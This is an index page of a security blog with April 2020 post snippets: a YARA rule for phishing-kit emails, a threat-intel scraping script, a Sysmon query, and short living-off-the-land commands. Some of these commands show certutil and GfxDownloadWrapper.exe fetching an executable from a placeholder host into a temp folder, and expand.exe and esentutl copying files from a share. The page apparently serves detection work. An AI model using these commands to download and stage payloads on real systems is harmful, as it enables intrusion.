neonprimetime security , just trying to help

Monday, April 27, 2020

phishingkit email phishing yara rule

›
/*     Phishing Kit Emails */ rule PhishingKitEmail {     strings:         $domain1 = "@gmail.com"         $domain2 = ...
1 comment:
Thursday, April 23, 2020

Script Query UrlHaus , OpenPhish, PhishTank and Extract Dns, IPs for Threat Intel Feed

›
code to pull dns & ips from urlhaus, openphish, phishtank, etc. #usage: iex (get-content .\GetData.ps1 | out-string) > output.txt ...
1 comment:
Wednesday, April 22, 2020

Query Sysmon Logs using Powershell Get-WinEvent

›
get-winevent -filterhashtable @{logname="Microsoft-Windows-Sysmon/Operational";id=1} | select Message |foreach-object {$a = $_.Mes...
1 comment:
Monday, April 20, 2020

GfxDownloadWrapper.exe downloader

›
cd c:\windows\system32\DriverStore\FileRepository\ki132337.inf_amd64_223d6831ffa64ab1 (sub folder may vary) GfxDownloadWrapper.exe https...
1 comment:

expand.exe files copied

›
to copy from a file share expand.exe \\share\test.txt c:\windows\temp\test.exe
2 comments:

esentutl file copies

›
Get from a file share esentutl.exe /y \\share\test.exe /d c:\windows\temp\test.exe
1 comment:

certutil downloader

›
certutil.exe -urlcache -split -f https://somewhere/test.exe c:\windows\temp\test.exe dir c:\windows\temp\test.exe
1 comment:
‹
›
Home
View web version
Powered by Blogger.